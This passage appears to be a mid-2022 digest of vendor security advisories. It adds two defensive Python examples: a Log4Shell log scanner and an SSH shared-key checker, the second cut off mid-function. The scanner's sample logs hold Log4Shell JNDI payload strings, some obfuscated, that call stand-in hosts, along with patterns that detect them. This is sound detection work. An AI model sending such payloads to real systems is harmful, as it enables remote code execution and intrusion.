Multiple vulnerabilities, including information disclosure and arbitrary speculative code
execution, have been discovered in several AMD processors used in desktop, mobile, graphics,
Chromebook and server products. Mitigations are available.
CVE ID: CVE-2022-29900 (RETbleed) (aka CVE-2022-23816), CVE-2022-23825
Windows 8.1 will reach end of support on January 10, 2023, at which point technical
assistance and software updates will no longer be provided. The affected editions are
Windows 8.1-Enterprise, Enterprise N, N, Pro with Media Center, Professional, Professional N
and SL.
A reflected DOM-Based XSS vulnerability has been discovered in the Help directory of Veeam
Management Pack for Microsoft System Center 8.0. Successful exploitation of this
vulnerability can allow for the execution of arbitrary scripts. Veeam Management Pack for
Microsoft System Center 8.0 has reached End-of-Fix, and all users are recommended to upgrade
to the latest version of Veeam Management Pack for Microsoft System Center.
CVE ID: CVE-2022-32225
Siemens has released security updates and mitigations to resolve multiple vulnerabilities in
its products.
CVE ID: CVE-2022-31619 (Critical), CVE-2022-26649 (Critical), CVE-2022-33736
(Critical), CVE-2021-29998 (Critical), CVE-2021-40358 (Critical), CVE-2021-44222 (Critical),
CVE-2022-34819 (Critical)
Hitachi Energy has released security updates to address multiple vulnerabilities in its MSM
equipment. Successful exploitation can allow an attacker to gain access to sensitive
information, cause a Denial of Service (DoS), or trick the user into downloading malicious
software. The affected products are MSM version 2.2 and earlier.
CVE ID: CVE-2018-16842 (Critical), CVE-2016-8618 (Critical), CVE-2016-8619
(Critical), CVE-2016-7167 (Critical)
Microsoft released security updates to mitigate multiple vulnerabilities in Azure Site
Recovery (ASR). These vulnerabilities affect all ASR on-premises customers using a
VMware/Physical to Azure scenario and are fixed in the latest ASR 9.49 release.
Adobe has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Microsoft has released security updates to address multiple vulnerabilities in its software.
An attacker can exploit these vulnerabilities to take control of an affected system.
SAP has released security updates to address several vulnerabilities affecting multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in the Dahua DHI-ASI7213X-T1, a facial
recognition access controller. Successful exploitation of these vulnerabilities can allow
unauthorized access, upload of malicious files and a Denial of Service (DoS) condition. The
affected product is Dahua ASI7213X-T1 firmware v1.000.10Be006.0.R.201213.
CVE ID: CVE-2022-2334 (High), CVE-2022-2335 (Medium), CVE-2022-2336 (High),
CVE-2022-2337 (High), CVE-2022-2338 (High)
Intel has released security updates to address multiple information disclosure
vulnerabilities in its products. An attacker can exploit these vulnerabilities to take
control of an affected system.
CVE ID: CVE-2022-28693 (Medium), CVE-2022-29901 (Medium)
HP has released security updates to resolve multiple information disclosure vulnerabilities
(known as RETbleed) discovered in some Intel Processors and AMD Processors. The affected
products are HP Wolf for Business, HP Wolf Pro Security, HP Sure Click Enterprise and HP
Sure Access Enterprise.
CVE ID: CVE-2022-23816 (Medium), CVE-2022-23824 (Medium), CVE-2022-23825 (Medium),
CVE-2022-28693 (Medium), CVE-2022-29901 (Medium)
HP has released updated versions of Tera2 Zero Client Firmware that remediate a
vulnerability discovered in firmware version 22.04 and earlier.
CVE ID: CVE-2022-1805 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Lenovo has released security updates to address multiple vulnerabilities in its products and
has also provided information and mitigations for vulnerabilities in Intel and AMD
processors affecting Lenovo products.
CVE ID: CVE-2022-34884, CVE-2022-34888, CVE-2022-1890, CVE-2022-1891, CVE-2022-1892,
CVE-2022-29901, CVE-2022-28693, CVE-2022-29900, CVE-2022-23825
Dell has released security updates to resolve an improper access control vulnerability in
the Identity and Access Management (IAM) module of Dell ECS that allows read access to
unauthorized data.
CVE ID: CVE-2022-31231 (Medium)
Lenze SE has released a security update to resolve a vulnerability in multiple cabinet
series products that skips password verification on a second login. Successful exploitation
can allow full access to the device without knowledge of the password.
CVE ID: CVE-2022-2302 (Critical)
It has been discovered that Python LDAP incorrectly handled certain regular expressions,
which can cause a Denial of Service (DoS). Security updates are available. The affected
products are Ubuntu 22.04, Ubuntu 21.10, Ubuntu 20.04 and Ubuntu 18.04.
CVE ID: CVE-2021-46823 (Medium)
It has been discovered that Dovecot incorrectly handled multiple passdb configuration
entries, which could allow privilege escalation. Security updates are available. The
affected products are Ubuntu 22.04, Ubuntu 21.10, Ubuntu 20.04 and Ubuntu 18.04.
CVE ID: CVE-2022-30550
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
A Cross-Site Scripting (XSS) vulnerability in Apache Tomcat affects F5's Traffix SDC.
Successful exploitation can compromise the confidentiality and integrity of data on the
affected system. The affected versions are Traffix SDC 5.2.0 and 5.1.0.
CVE ID: CVE-2022-34305 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released a security update to address memory access vulnerabilities in the Vim
package that can cause corruption of sensitive information, a crash, arbitrary code
execution, or the use of unexpected values.
CVE ID: CVE-2022-1968 (High), CVE-2022-1897 (High), CVE-2022-1942 (High)
Multiple vulnerabilities have been discovered in the Bently Nevada 3701/4X series (all
versions) and 60M100 (3701/60) (all versions) Condition Monitoring System (CMS) that can
allow file manipulation, Remote Code Execution (RCE), or cause a Denial-of-Service (DoS)
condition. Security updates are available for the Bently Nevada 3701/4X series. Bently
Nevada 60M100 (3701/60) is approaching end-of-life status, and only mitigations are
available.
CVE ID: CVE-2022-29953 (Critical), CVE-2022-29952 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates for
some products are available.
CVE ID: CVE-2022-1183 (High), CVE-2022-1734 (High), CVE-2022-1998 (High),
CVE-2022-2068 (Medium), CVE-2022-23712 (High), CVE-2022-28660 (Critical), CVE-2022-29170
(High), CVE-2022-30594 (High), CVE-2022-22976 (Medium), CVE-2022-22978 (Critical),
CVE-2022-31621 (Medium), CVE-2022-31622 (Medium), CVE-2022-31623 (Medium), CVE-2022-31624
(Medium)
An improper restriction of rendered UI layers or frames vulnerability has been discovered in
Rockwell Automation's MicroLogix 1100/1400 equipment that can lead to a loss of sensitive
information, such as authentication credentials.
CVE ID: CVE-2022-2179 (Medium)
Dell has released security updates to address multiple vulnerabilities in Dell PowerStore
Family that can be exploited by malicious users to compromise the affected system.
Google has released Beta channel 104.0.5112.36 (Platform version: 14909.52.0) for most
ChromeOS devices, Beta channel 104.0.5112.39 for Windows, Mac and Linux, and Chrome Beta 104
(104.0.5112.37) for Android.
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Mitsubishi Electric has released security updates to resolve a Denial of Service (DoS)
vulnerability due to uncontrolled resource consumption in the Mitsubishi Electric MELSEC
iQ-R Series C Controller Module.
CVE ID: CVE-2021-20600
Microsoft has released Microsoft Edge Stable Channel (Version 103.0.1264.49), which
incorporates the latest security updates of the Chromium project. The security updates
resolve a heap buffer overflow vulnerability in WebRTC and a type confusion vulnerability in
V8.
CVE ID: CVE-2022-2294, CVE-2022-2295
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-06-05 or later address all of these
issues.
Festo has released security updates to address multiple preauthentication command injection
vulnerabilities in the Festo controller CECC-X-M1 product family. Any person who is able to
gain access to the webserver can run arbitrary system commands on the device with root
privileges.
CVE ID: CVE-2022-30308 (Critical), CVE-2022-30309 (Critical), CVE-2022-30310
(Critical), CVE-2022-30311 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20812 (Critical), CVE-2022-20813 (Critical), CVE-2022-20808 (High),
CVE-2022-20752 (Medium), CVE-2022-20862 (Medium), CVE-2022-20859 (Medium), CVE-2022-20768
(Medium), CVE-2022-20815 (Medium), CVE-2022-20800 (Medium), CVE-2022-20791 (Medium)
Maui ransomware is being used to target Healthcare and Public Health (HPH) Sector
organisations. Maui ransomware (maui.exe) is an encryption binary. Maui uses a combination
of Advanced Encryption Standard (AES), RSA, and XOR encryption to encrypt target files.
Dell has released a security update to address a Remote Code Execution (RCE) vulnerability
in Cloud Mobility for Dell EMC Storage version 1.3.0 and prior. Any basic user may
purposefully or accidentally exploit this vulnerability, leading to RCE with full takeover
of the system.
CVE ID: CVE-2022-33936 (High)
SUSE has released a security update to resolve a Denial of Service (DoS) vulnerability in
haproxy triggered via the Set-Cookie2 header.
CVE ID: CVE-2022-0711 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Huawei has released a HarmonyOS security bulletin to address multiple vulnerabilities
affecting several Huawei phones and tablets that run HarmonyOS. Security patch levels of
2022-07-01 or later address all of these issues.
A vulnerability exists in the OpenSSL RSA implementation for X86_64 CPUs supporting the
AVX512IFMA instructions. The affected version is OpenSSL 3.0.4. It is recommended to
upgrade to OpenSSL 3.0.5.
CVE ID: CVE-2022-2274 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in various WordPress plugins. A security
update is available for the Visualizer WordPress plugin. No patches are available for the
AnyMind Widget and FreeMind WP Browser WordPress plugins.
CVE ID: CVE-2022-2251 (High), CVE-2022-2252 (High), CVE-2022-2256 (High)
Dell has released a security update to address a privilege escalation vulnerability in Dell
PowerProtect Cyber Recovery versions before 19.11.
CVE ID: CVE-2022-32481 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address multiple vulnerabilities in PHP and Django.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-31625 (Critical), CVE-2022-31626 (High), CVE-2022-34265 (High)
Django has released security updates to address a SQL injection vulnerability in Django's
main branch and versions 4.1, 4.0, and 3.2.
CVE ID: CVE-2022-34265 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released updated Chrome 103 (103.0.5060.71) for Android, Stable channel
103.0.5060.114 for Windows, and Extended Stable channel 102.0.5005.148 for Windows and Mac.
An exploit for the heap buffer overflow vulnerability (CVE-2022-2294) exists in the wild.
CVE ID: CVE-2022-2294 (High), CVE-2022-2295 (High), CVE-2022-2296 (High)
SUSE has released security updates to resolve multiple vulnerabilities in Linux Kernel.
CVE ID: CVE-2022-1116 (High), CVE-2022-1734 (High), CVE-2022-1966, CVE-2022-1972,
CVE-2022-32250 (High)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. The Debian Long Term Support (LTS) team also announced that Debian 9 stretch support
has reached its end-of-life on July 1, 2022. Debian will not provide further security
updates for Debian 9.
Ubuntu has released security updates to address multiple vulnerabilities in the Linux kernel
and curl packages. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-28388 (High), CVE-2022-21125 (Medium), CVE-2022-21123 (Medium),
CVE-2022-21166 (Medium), CVE-2022-1652 (High), CVE-2022-1353 (High), CVE-2022-28356 (High),
CVE-2022-1734 (High), CVE-2021-4202 (High), CVE-2022-1419 (High), CVE-2021-4197 (High),
CVE-2022-1679 (High), CVE-2022-27781 (High), CVE-2022-32208
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that NVFLARE contains a vulnerability in its PKI implementation
module that can cause Remote Code Execution (RCE) and Denial of Service (DoS), and impact
both confidentiality and integrity. The affected products are NVFLARE versions prior to
2.1.2.
CVE ID: CVE-2022-31604 (Critical)
It has been discovered that NVFLARE contains a vulnerability in its utils module that can
cause Remote Code Execution (RCE) and Denial of Service (DoS), and impact both
confidentiality and integrity. The affected products are NVFLARE versions prior to 2.1.2.
CVE ID: CVE-2022-31605 (Critical)
Ubuntu has released security updates to address multiple vulnerabilities in the curl package
that can allow a machine-in-the-middle attack and a Denial of Service (DoS) attack.
CVE ID: CVE-2022-32208, CVE-2022-27781 (High)
Multiple vulnerabilities have been discovered in various WordPress plugins. Security updates
are available for the WP All Import and Download Manager WordPress plugins. No patch is
available for the Image Slider and Gallery for Social Photo WordPress plugins.
CVE ID: CVE-2022-1565 (Medium), CVE-2022-2223 (Medium), CVE-2022-2224 (Medium),
CVE-2022-2101 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system.
Multiple OT:ICEFALL vulnerabilities have been discovered in Emerson's DeltaV Distributed
Control System. Successful exploitation of these vulnerabilities can result in a
Denial-of-Service (DoS) condition, manipulation of runtime communications, or compromise of
a controller.
CVE ID: CVE-2022-29957 (Medium), CVE-2022-29962 (Medium), CVE-2022-29963 (Low),
CVE-2022-29964 (Medium), CVE-2022-29965 (High), CVE-2022-30260 (Medium)
CODESYS has released security updates to address multiple vulnerabilities in CODESYS V3
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-30791 (Medium), CVE-2022-30792 (Medium), CVE-2022-22519 (High),
CVE-2022-22513 (High), CVE-2022-22514 (High), CVE-2022-22518 (Medium), CVE-2022-22517
(High), CVE-2022-22515 (High)
Google has released updated Dev channel 105.0.5148.2 for Windows, Mac and Linux, Chrome Beta
104 (104.0.5112.29) for iOS, and Chrome Dev 105 (105.0.5149.0) for Android.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An improper authentication vulnerability has been discovered in Exemys' Equipment- RME1 that
can allow an attacker with network access to bypass authentication and perform
administrative operations. It is recommended to update to a new supported product RME2 as
RME1 is considered to be an end-of-life product. CVE ID: CVE-2022-2197 (Critical)
Cross-Site Scripting (XSS) and OS command injection vulnerabilities have been discovered in
Distributed Data Systems' Equipment- WebHMI, which can allow a user with administrative
privileges in WebHMI to execute arbitrary OS commands or impact other logged-in users. The
affected products are WebHMI 4.1.1.7662 and possibly prior versions. CVE ID: CVE-2022-2254 (Medium), CVE-2022-2253 (Critical)
GitLab has released updated versions 15.1.1, 15.0.4, and 14.10.5 for GitLab Community
Edition (CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities. CVE ID: CVE-2022-2185 (Critical), CVE-2022-2235 (High), CVE-2022-2230 (High),
CVE-2022-2229 (High)
NetApp has released security updates to resolve multiple vulnerabilities in several NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1116 (High), CVE-2018-10237 (Medium)
McAfee has released a security update to address a privilege escalation vulnerability in
Data Exchange Layer (DXL) Broker for Windows prior to 6.0.0.280. CVE ID: CVE-2022-2188 (Medium)
Atlassian has released security updates to address a vulnerability that allows a remote,
authenticated user to perform a full-read Server Side Request Forgery (SSRF) in the Mobile
Plugin for Jira Data Center and Server. CVE ID: CVE-2022-26135 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Ubuntu has released security updates to address a vulnerability in its cloud-init package
that caused password hashes to be logged when reporting schema failures. An attacker with
access to these logs could use them to recover user credentials. CVE ID: CVE-2022-2084
Mozilla has released a security update to address a vulnerability in Firefox for iOS. An
attacker can exploit this vulnerability to take control of an affected system. CVE ID: CVE-2022-31746 (Medium)
Google has released Chrome Beta 104 (104.0.5112.29) & Chrome 103 (103.0.5060.70) for
Android, Dev channel 105.0.5140.0 (Platform version: 14943.0.0) & Beta channel 104.0.5112.23
(Platform version: 14909.26.0) for most ChromeOS devices and Beta channel 104.0.5112.29 for
Windows, Mac and Linux.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-29599 (Critical), CVE-2021-36773 (High), CVE-2022-31214 (High)
MITRE has released a list of the top 25 most dangerous software weaknesses that can cause
exploitation of vulnerabilities and allow adversaries to completely take over a system,
steal data, or prevent applications from working.
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.11 and 102, Firefox 102, and Firefox ESR 91.11. An attacker can exploit these
vulnerabilities to take control of an affected system.
ABB has released security updates to address multiple incorrect default permissions
vulnerabilities in its equipment- e-Design which can allow privilege escalation or a
Denial-of-Service (DoS) condition. The affected products are e-Design, all versions prior to
1.12.2.0006. CVE ID: CVE-2022-28702 (Medium), CVE-2022-29483 (High)
Multiple OT:ICEFALL vulnerabilities have been discovered in Omron Equipment- SYSMAC CS/CJ/CP
Series & NJ/NX Series. Successful exploitation of these vulnerabilities can cause a
Denial-of-Service (DoS) condition and allow Remote Code Execution (RCE).
CVE ID: CVE-2022-31204 (Medium), CVE-2022-31205 (Medium), CVE-2022-31206 (Medium),
CVE-2022-31207 (Medium)
A missing authentication for critical function OT:ICEFALL vulnerability has been discovered
in Motorola Solutions' Equipment- MOSCAD IP Gateway (all versions) and ACE IP Gateway (all
versions). Successful exploitation of this vulnerability can result in manipulation of the
device configuration. CVE ID: CVE-2022-30276 (High)
Multiple OT:ICEFALL vulnerabilities have been discovered in Motorola Solutions' Equipment-
MDLC. Successful exploitation of these vulnerabilities can result in message manipulation,
exposure of the attack surface of the MDLC protocol parser, memory corruption, and exposure
of sensitive information. The affected products are MDLC versions 4.80.0024, 4.82.004 &
4.83.001. CVE ID: CVE-2022-30273 (Medium), CVE-2022-30275 (High)
Huawei has released a security update to address a password verification vulnerability in
WS7200-10 which can cause disclosure of sensitive system information. The affected product
is WS7200-10 version 11.0.2.13. CVE ID: CVE-2022-33735 (Medium)
Foxit has released an updated Foxit PDF Reader 12.0 and Foxit PDF Editor 12.0 to resolve
multiple vulnerabilities in Foxit PDF Reader version 11.2.2.53575 & earlier, Foxit PDF
Editor version 11.2.2.53575 & all previous 11.x versions and Foxit PDF Editor version
10.1.8.37795 & earlier versions.
Hitachi Energy has released security updates to address a vulnerability in the Modbus stack
that can cause stack overflow which results in a reboot of the product. The affected
products are Hitachi Energy's RTU500 series. CVE ID: CVE-2022-2081 (High)
Advantech has released a security update to address multiple vulnerabilities in Advantech's
Equipment- iView that can allow an attacker to read or modify sensitive data, disclose
information, or execute arbitrary code. The affected products are Advantech iView management
software, all versions prior to 5_7_04_6469.
CVE ID: CVE-2022-2143 (Critical), CVE-2022-2135 (High), CVE-2022-2136 (High),
CVE-2022-2137 (Medium), CVE-2022-2142 (High), CVE-2022-2138 (High), CVE-2022-2139 (Medium)
Multiple OT:ICEFALL vulnerabilities have been discovered in all versions of Motorola
Solutions ACE1000, a Remote Terminal Unit (RTU). Remediations and upgrades are available.
CVE ID: CVE-2022-30271 (Critical), CVE-2022-30270 (Critical), CVE-2022-30274 (High),
CVE-2022-30269 (Medium), CVE-2022-30272 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released Dev channel 104.0.5112.23 (Platform version: 14909.26.0) for most
ChromeOS devices, Stable channel 103.0.5060.66 for Windows, and Stable channel 103.0.5060.64
(Platform version: 14816.82.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address a vulnerable USB2CAN interface
implementation in Linux kernel. A local attacker can use this vulnerability to cause a
denial of service (system crash). CVE ID: CVE-2022-28388 (High)
Dell has released security updates to address OpenSSL vulnerability in Dell Precision
Workstation that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-0778 (Medium)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Citrix has released security updates to address multiple vulnerabilities in Citrix
Hypervisor that may allow privileged code in a PV guest VM to compromise the host. CVE ID: CVE-2022-26362 (Medium), CVE-2022-21123, CVE-2022-21125, CVE-2022-21127,
CVE-2022-21166
OFFIS has released security updates to address Path Traversal, Relative Path Traversal, and
NULL Pointer Dereference vulnerabilities in its Equipment- DCMTK. Successful exploitation of
these vulnerabilities can allow an attacker to cause a denial-of-service condition, write
malformed DICOM files into arbitrary directories, and gain remote code execution. CVE ID: CVE-2022-2119 (High), CVE-2022-2120 (High), CVE-2022-2121 (Medium)
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard
Cyber Command (CGCYBER) have released a joint Cybersecurity Advisory (CSA) to warn network
defenders that cyber threat actors, including state-sponsored advanced persistent threat
(APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and
Unified Access Gateway (UAG) servers to obtain initial access to organisations that did not
apply available patches or workarounds.
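A practical check that follows from the CISA/CGCYBER advisory above is to look for Log4Shell
lookup strings in the access logs of internet-facing Horizon and UAG hosts. The script below
is an added example, not part of the advisory or of any VMware or CISA tooling. The log lines
are constructed for the example (RFC 5737 test addresses, made-up paths) and the obfuscation
handling covers only the three common tricks listed in the comments; real attackers use more.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample access log lines (not from any real incident). Each line ends
# with the User-Agent field, which is where many Log4Shell payloads were placed.
SAMPLE_LOGS = [
    '10.0.0.5 - - [16/Jun/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [16/Jun/2022:10:01:05 +0000] "GET /portal/info.jsp HTTP/1.1" 200 '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - [16/Jun/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 '
    '"${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.10/x}"',
    '10.0.0.9 - - [16/Jun/2022:10:01:11 +0000] "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.11/y}"',
    '10.0.0.9 - - [16/Jun/2022:10:01:13 +0000] "GET / HTTP/1.1" 200 '
    '"%24%7Bjndi%3Adns%3A%2F%2F203.0.113.12%2Fz%7D"',
    '10.0.0.9 - - [16/Jun/2022:10:01:15 +0000] "GET /price?q=${env:HOSTNAME} HTTP/1.1" '
    '404 "curl/7.68"',
]

# Innermost-only patterns: each matches a ${...} that contains no nested ${...},
# so repeated substitution peels obfuscation layers from the inside out.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${x:-y} -> y, incl. ${::-y}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/:}\s]+)", re.IGNORECASE)
_ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def normalize(text: str) -> str:
    """Collapse URL encoding, ${lower:}/${upper:} wrappers and ${x:-y} defaults
    until the text stops changing, so a plain ${jndi: match becomes possible."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Return one finding per suspicious line. 'jndi' findings carry the lookup
    scheme and callback host for blocking/triage; any other surviving ${...}
    lookup is reported as 'lookup' so it can be reviewed by hand."""
    findings: List[Dict[str, Optional[str]]] = []
    for number, raw in enumerate(lines, start=1):
        line = normalize(raw)
        match = _JNDI.search(line)
        if match:
            findings.append({"line": number, "kind": "jndi",
                             "scheme": match.group(1).lower(), "target": match.group(2)})
        elif _ANY_LOOKUP.search(line):
            findings.append({"line": number, "kind": "lookup", "scheme": None, "target": None})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

A hit on a host that was patched after the exploitation window is still worth treating as a
possible compromise: the advisory's point is that actors had already obtained access before
patches were applied, so the callback host in the `target` field belongs in the investigation
scope, not just in a blocklist.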
Ubuntu has released security updates to resolve multiple vulnerabilities in Apache HTTP
Server. An attacker can exploit these vulnerabilities to take control of an affected system.
Google has released Chrome 104 (104.0.5112.20) Beta channel for Windows, Mac & Linux, Chrome
Beta 104 (104.0.5112.22) for iOS and Chrome Dev 105 (105.0.5135.3) & Chrome Beta 104
(104.0.5112.18) for Android.
CODESYS has released security updates to address multiple vulnerabilities in its products.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-31802 (Critical), CVE-2022-31803 (Critical), CVE-2022-31804
(Critical), CVE-2022-31805 (Critical), CVE-2022-31806 (Critical), CVE-2022-1965 (High),
CVE-2022-32136 (High), CVE-2022-32137 (High), CVE-2022-32138 (High), CVE-2022-32139 (High),
CVE-2022-32140 (High), CVE-2022-32141 (High), CVE-2022-32142 (High), CVE-2022-32143 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vendors' Operational Technology (OT) products are affected by a set of 56
vulnerabilities named "OT:ICEFALL", caused by insecure-by-design practices in OT. The
products affected by OT:ICEFALL are known to be prevalent in the industries that form the
backbone of critical infrastructure.
Cybersecurity authorities from the United States, New Zealand, and the United Kingdom have
released a joint Cybersecurity Information Sheet (CIS) on PowerShell. The CIS recommends
proper configuration and monitoring of PowerShell rather than removing or disabling it
entirely because malicious actors use it after gaining access to victim networks. These
recommendations help defenders detect and prevent abuse by malicious cyber actors while
enabling legitimate use by administrators and defenders.
Ubuntu has released security updates to resolve a vulnerability in the Squid and Squid3
packages, which incorrectly handled the Gopher protocol; this could cause Squid to crash,
resulting in a Denial of Service (DoS). CVE ID: CVE-2021-46784
Cisco has released security updates to resolve arbitrary code execution and command
injection vulnerabilities in multiple Cisco products. An attacker can exploit these
vulnerabilities to take control of an affected system. CVE ID: CVE-2022-20828 (Medium), CVE-2022-20829 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in Free Live Chat
Support WordPress plugin. The affected versions are Free Live Chat Support versions up to,
and including 1.0.11. CVE ID: CVE-2022-2039 (High)
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the DX Share
Selection WordPress plugin. The affected versions are DX Share Selection plugin versions up
to, and including 1.4. CVE ID: CVE-2022-2001 (High)
Dell has released security updates to address multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2021-4160 (Medium), CVE-2022-24423 (Medium), CVE-2022-0778 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An out-of-bounds write vulnerability has been discovered in the EtherNet/IP Adapter
Development Kit (EADK) from Pyramid Solutions, a component used in Weidmueller Interface
products. Successful exploitation by sending a specially crafted packet can result in a
Denial of Service (DoS) condition. CVE ID: CVE-2022-1737 (Critical)
An insufficient verification of data authenticity vulnerability has been discovered in
Phoenix Contact's equipment- ProConOS/ProConOS eCLR and MULTIPROG that can allow the upload
of arbitrary malicious code after gaining access to the communication to products utilizing
it. Mitigations and workarounds are available. CVE ID: CVE-2022-31801 (Critical)
An insufficient verification of data authenticity vulnerability has been discovered in
Phoenix Contact's equipment- ILC, AXC, RFC, PC WORX & FC, that can allow an attacker to
upload logic with arbitrary code. Mitigations and workarounds are available.
CVE ID: CVE-2022-31800 (Critical)
A missing authentication for critical function vulnerability has been discovered in several
Phoenix Contact products. Successful exploitation can allow changes to configurations,
manipulation of services, or a Denial of Service (DoS) condition. Mitigations and
workarounds are available. CVE ID: CVE-2019-9201 (Critical)
It has been discovered that SIMATIC WinCC OA performs client-side only authentication when
neither server-side authentication (SSA) nor Kerberos authentication is enabled, which can
allow attackers to impersonate other users or exploit the client-server protocol without
being authenticated. Remediation is available. CVE ID: CVE-2022-33139 (Critical)
Google has released Chrome 103 (103.0.5060.53) for Android, Extended Stable channel
102.0.5005.134 for Windows & Mac, Chrome Stable 103 (103.0.5060.54) for iOS, LTS LTC-102
102.0.5005.75 (Platform Version: 14695.85.0) for most ChromeOS devices, Chrome Dev 104
(104.0.5112.18) for Android, and Chrome 103 stable channel (103.0.5060.53)for Windows, Mac
and Linux to resolve multiple vulnerabilities. CVE ID: CVE-2022-2156 (Critical)
A missing authentication for critical function vulnerability has been discovered in JTEKT's
Equipment- TOYOPUC Products, that can cause a Denial of Service condition, change control
logic, or disable communication links. Workarounds are available. CVE ID: CVE-2022-29951 (High), CVE-2022-29958 (High)
It has been discovered that the SMA Technologies OpCon UNIX agent adds the same SSH key on
every installation and on subsequent updates. An attacker with access to the private key can
gain root access on affected systems. SMA Technologies has released a tool to address this
vulnerability. CVE ID: CVE-2022-2154
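The weakness described above (one public key trusted for root across an entire fleet) is
easy to spot from the defender's side without knowing the key in advance: collect the root
`authorized_keys` files and look for a fingerprint that recurs on many hosts. The script below
is an added example and is not SMA's remediation tool or part of the advisory. The inventory
and the key material are constructed for the example (the "public keys" are hashed
placeholders, not real keys); the fingerprint format matches what `ssh-keygen -lf` prints, so
results can be cross-checked against that command.

```python
import base64
import hashlib
import struct
from collections import defaultdict
from typing import Dict, List

# Key types whose authorized_keys token is followed by the base64 key blob.
KEY_TYPES = (
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
)


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def make_ed25519_line(seed: int, comment: str) -> str:
    """Build a syntactically valid ssh-ed25519 authorized_keys line around a fake
    32-byte public key derived from the seed (constructed for the example only)."""
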